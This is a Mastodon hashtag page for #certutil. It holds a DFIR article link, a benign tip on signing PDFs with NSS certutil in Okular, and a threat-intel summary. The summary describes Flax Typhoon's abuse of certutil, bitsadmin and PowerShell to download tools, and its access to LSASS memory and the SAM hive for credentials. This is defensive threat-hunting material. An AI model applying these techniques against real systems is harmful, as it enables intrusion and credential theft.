Tedi Heriyanto<p>DFIR Next Steps: What To Do After You Find a Suspicious Use Of certutil.exe: <a href="https://www.cybertriage.com/dfir-next-steps/dfir-next-steps-what-to-do-after-you-find-a-suspicious-use-of-certutil-exe/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">cybertriage.com/dfir-next-step</span><span class="invisible">s/dfir-next-steps-what-to-do-after-you-find-a-suspicious-use-of-certutil-exe/</span></a></p><p><a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/certutil" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>certutil</span></a></p>
Recent searches
No recent searches
Search options
Only available when logged in.
ioc.exchange is one of the many independent Mastodon servers you can use to participate in the fediverse.
INDICATORS OF COMPROMISE (IOC)
InfoSec Community within the Fediverse. Newbies, experts, gurus - Everyone is Welcome! Instance is supposed to be fast and secure.
Administered by:
Server stats:
1.6Kactive users
ioc.exchange: About · Status · Profiles directory · Privacy policy
Mastodon: About · Get the app · Keyboard shortcuts · View source code · v4.3.4
#Certutil
0 posts · 0 participants · 0 posts today
🏁⚡Omar Two Tone⚡🏁:verified:<p>random <a href="https://ioc.exchange/tags/Linux" class="mention hashtag" rel="tag">#<span>Linux</span></a> Tip:<br />if you have to sign digitally many <a href="https://ioc.exchange/tags/PDF" class="mention hashtag" rel="tag">#<span>PDF</span></a> documents, then follow the next steps:<br />1. create a new certificate with <a href="https://ioc.exchange/tags/certutil" class="mention hashtag" rel="tag">#<span>certutil</span></a> command:<br />certutil -S -s "CN=[ your full name ],O= [ Business or School ],OU=[ Deparment or position ],L= [ Location ],ST=[ State ],C= [ Country code ],E= [ your email ]" -g 2048 -d sql:$HOME/.pki/nssdb -n [ new name of certificate ] -x -t "Cu,Cu,Cu" -p 405-555-5555 --email [ your email ] -m 1234<br />2. List the created certificate:<br />certutil -d sql:$HOME/.pki/nssdb -L<br />3. Use <a href="https://ioc.exchange/tags/Okular" class="mention hashtag" rel="tag">#<span>Okular</span></a> and go to: Settings > configure backends > PDF<br />4. In the section: Certificate database, choose Custom and enter this path: $HOME/.pki/nssdb<br />5. Apply and Restart Okular, and then you'd see the available certificate in the option of step 4 to sign digitally.</p>
Just Another Blue Teamer<p>Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as <a href="https://ioc.exchange/tags/FlaxTyphoon" class="mention hashtag" rel="tag">#<span>FlaxTyphoon</span></a>. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like <a href="https://ioc.exchange/tags/ChinaChopper" class="mention hashtag" rel="tag">#<span>ChinaChopper</span></a>, <a href="https://ioc.exchange/tags/MetaSploit" class="mention hashtag" rel="tag">#<span>MetaSploit</span></a>, and <a href="https://ioc.exchange/tags/Mimikatz" class="mention hashtag" rel="tag">#<span>Mimikatz</span></a>, they also rely on abusing <a href="https://ioc.exchange/tags/LOLBINS" class="mention hashtag" rel="tag">#<span>LOLBINS</span></a>, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using <a href="https://ioc.exchange/tags/powershell" class="mention hashtag" rel="tag">#<span>powershell</span></a>, <a href="https://ioc.exchange/tags/certutil" class="mention hashtag" rel="tag">#<span>certutil</span></a>, or <a href="https://ioc.exchange/tags/bitsadmin" class="mention hashtag" rel="tag">#<span>bitsadmin</span></a> to download tools, and accessing <a href="https://ioc.exchange/tags/LSASS" class="mention hashtag" rel="tag">#<span>LSASS</span></a> process memory and Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but it provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and <a href="https://ioc.exchange/tags/HappyHunting" class="mention hashtag" rel="tag">#<span>HappyHunting</span></a>!</p><p><a href="https://ioc.exchange/tags/CyberSecurity" class="mention hashtag" rel="tag">#<span>CyberSecurity</span></a> <a href="https://ioc.exchange/tags/ITSecurity" class="mention hashtag" rel="tag">#<span>ITSecurity</span></a> <a href="https://ioc.exchange/tags/InfoSec" class="mention hashtag" rel="tag">#<span>InfoSec</span></a> <a href="https://ioc.exchange/tags/BlueTeam" class="mention hashtag" rel="tag">#<span>BlueTeam</span></a> <a href="https://ioc.exchange/tags/ThreatIntel" class="mention hashtag" rel="tag">#<span>ThreatIntel</span></a> <a href="https://ioc.exchange/tags/ThreatHunting" class="mention hashtag" rel="tag">#<span>ThreatHunting</span></a> <a href="https://ioc.exchange/tags/ThreatDetection" class="mention hashtag" rel="tag">#<span>ThreatDetection</span></a> <a href="https://ioc.exchange/tags/readoftheday" class="mention hashtag" rel="tag">#<span>readoftheday</span></a></p>
ExploreLive feeds
Mastodon is the best way to keep up with what's happening.
Follow anyone across the fediverse and see it all in chronological order. No algorithms, ads, or clickbait in sight.
Create accountLoginDrag & drop to upload